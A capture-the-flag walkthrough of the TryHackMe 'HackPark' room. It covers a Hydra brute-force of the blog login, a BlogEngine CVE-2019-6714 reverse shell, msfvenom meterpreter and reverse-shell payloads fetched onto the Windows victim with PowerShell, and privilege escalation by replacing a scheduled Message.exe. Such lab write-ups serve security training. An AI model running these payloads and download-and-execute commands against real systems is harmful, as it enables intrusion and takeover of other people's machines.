> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hackpark.md).

# HackPark

**Room Link:** <https://tryhackme.com/room/hackpark>

### Using Hydra to brute-force a login

**What request type is the Windows website login form using?**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F1nw51VRNNb5N24mKc54w%2Fimage.png?alt=media&amp;token=d1cdf505-ff4a-4246-9f7c-d15b564fd4a5" alt=""><figcaption></figcaption></figure>

**Crafting request for Hydra**

Sent a failed login request to Burp to see what it would look like. With this info I was able to craft my request for hydra. I just needed to get the URL and everything that is sent after VIEWSTATE and just change the input to use ^USER^ and ^PASS^ to brute force these fields.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZ2jY4jPIVZHGw1jtausu%2Fimage.png?alt=media&amp;token=edf277b9-b16f-4fe8-b48c-ae23dbb9d0ad" alt=""><figcaption></figcaption></figure>

I could also do this without burp by just opening the console and getting the info from there

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FLwXJ3MyZstEYQAtXK13Q%2Fimage.png?alt=media&amp;token=35bc6789-5d2b-4282-b707-4fdebeca5a9a" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.110.93 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=vvTqZ%2FG4tEKhQoxeTpJ%2FyGxM9ZY9ZIvd6YMUS%2BoY3uaQCjC%2BJRdlkd8rbIQsDHztL%2BjsAvOLJhxU7vTNo3GP%2FLEmsndGPNAlCDn%2FB%2FrK2ynp9QkhRe9iqKBUmM5FQT2kX%2Bg%2BfPDNnTuzqW5IlmTujw4sLEzbvvec9FDW4cbQevgTj1tHnKx0vMmkVah5imro0o%2BHvQ5%2FGvpafEs1NdnW6wrSsUFuXnYzletKCdLG%2FgSb7bCDOK4ukZK%2F1cMOgYtjOCU4gk4M7PhQcYZmGpAN7pPVCMpX2YwGnTSgBPPmCB6avoLqG5jRS%2F3PYMjsqEGcD9P9S555GMQPxtfyvOEaJw%2B%2BZELKU2yVYr4uWxamEITsWNAT&__EVENTVALIDATION=Tp%2B5DS80H3PFB8ipJ24uKyHkPhSkqKD7GFJlc2U6IaO61l68aholdIjrZJ%2FsotSi0QxRBQjayWovmb2SU%2Fk6lY%2BOpju62jOGDkAvqcdNsqGrgf3vrAYw88XT2ONABFvDTR771I2YAr7JylJ0HbBZV83nGvvXWSC6rmKDGn80%2FuszTjDZ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed" -V
```

{% endcode %}

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FBkHFsGwf74NqrqZJb9O7%2Fimage.png?alt=media&amp;token=6720c258-c547-4573-ac4c-bf97b8dcf7d2" alt=""><figcaption><p>Credentials found</p></figcaption></figure>

### Compromise the machine

**Now you have logged into the website, are you able to identify the version of the BlogEngine?**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fw5SC1Gc2zEzSykJIrafo%2Fimage.png?alt=media&amp;token=f6456a42-62e2-4542-b2b3-b1f9adbccf77" alt=""><figcaption></figcaption></figure>

**What is the CVE?**

CVE-2019-6714

**Exploit Link:** <https://www.exploit-db.com/exploits/46353>

**Using the public exploit, gain initial access to the server. Who is the webserver running as?**

Created the file mentioned in the exploit, just changed the IP to my IP.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Ft2ofgCILfzJMJdnhbOt5%2Fimage.png?alt=media&amp;token=395d9255-e61d-4ebf-a162-d3ece9ad6793" alt=""><figcaption></figcaption></figure>

Setup a nc listener&#x20;

```
rlwrap nc -lvnp 4445
```

Upload the file

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FyD9TQ2OgbN0Gfr0CXMT5%2Fimage.png?alt=media&amp;token=88620264-5a05-4adf-ad61-6f43318b6a03" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FzoTaiQhKpSMyHuarpAPJ%2Fimage.png?alt=media&amp;token=ad911a09-504a-4b5a-a13c-1f4bffecf4d8" alt=""><figcaption></figcaption></figure>

Navigate to the link and the nc listener should have caught it

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FhrOCRVgE4LnfSKzl55Wy%2Fimage.png?alt=media&amp;token=1f02a9e2-a3df-4eba-988b-6cecf6b8d9c3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXCcpkGFhajDNErjnqRq6%2Fimage.png?alt=media&amp;token=72bec8cd-52f2-49ce-8c52-3f643c9afb14" alt=""><figcaption></figcaption></figure>

### **Windows Privilege Escalation**

**Setting up meterpreter shell**

**Kali #1**&#x20;

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.218.233 LPORT=1337 -e x86/shikata_ga_nai -f exe -o reverse.exe
python2 -m SimpleHTTPServer 81
```

**Kali #2**&#x20;

```
msfconsole 
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 10.10.218.233  
set LPORT 1337 
run
```

**Victim**&#x20;

```
cd C:\Windows\Temp powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/reverse.exe','reverse.exe')" reverse.exe
```

**What is the OS version of this windows machine?**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FrTNSns6mSWepG2v0tFWb%2Fimage.png?alt=media&amp;token=74a1f917-a500-4e9e-9ddf-d0632f1c7f42" alt=""><figcaption></figcaption></figure>

**Further enumerate the machine. What is the name of the abnormal&#x20;*****service*****&#x20;running?**

**Check Windows Exploit Suggester**

**Kali**

```
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git 
cd Windows-Exploit-Suggester/ 
python3.9 windows-exploit-suggester.py --update 
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
```

**Transfer WinPeas**

**Kali**&#x20;

```
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe 
python2 -m SimpleHTTPServer 81
```

**Victim**&#x20;

```
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/winPEASx64.exe','winPEASx64.exe')" 
winPEASx64.exe
```

![](https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Ff0kxHG7Im5QA4QsMGDgC%2Fimage.png?alt=media\&token=95c47177-45d8-47eb-aab6-07b9f2b48c11)

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FqBiqGHudkL21twMwsUi0%2Fimage.png?alt=media&amp;token=bcd043ff-d371-4ade-9a90-7c2e29d8ff31" alt=""><figcaption></figcaption></figure>

```
cd C:\Program Files (x86)\SystemScheduler\Events
type 20198415519.INI_LOG.txt
```

We can see Message.exe is kept being ran by Administrator so we just need to replace the file with our reverse shell, setup a listener and wait for the Administrator to try to run it.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F1wy1uJBzDIRxFkWIWVCw%2Fimage.png?alt=media&amp;token=a104c615-ba7d-4f60-b567-b849a6bf8ede" alt=""><figcaption><p>Message.exe is called by Administrator </p></figcaption></figure>

**Kali**&#x20;

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.218.233 LPORT=1337 -f exe -o Message.exe 
python2 -m SimpleHTTPServer 81 rlwrap nc -lvnp 1337
```

**Victim**&#x20;

```
cd C:\Program Files (x86)\SystemScheduler 
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/Message.exe','Message.exe')"
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FRhsfrwlCJk2LDElkhWfW%2Fimage.png?alt=media&amp;token=e2dd36c3-aab8-4a62-b0ba-967e77aeee2e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fe7Bai7DZpxAs5FXoWaUC%2Fimage.png?alt=media&amp;token=32be5cac-064b-46aa-a8b5-6ba51eb0d460" alt=""><figcaption></figcaption></figure>
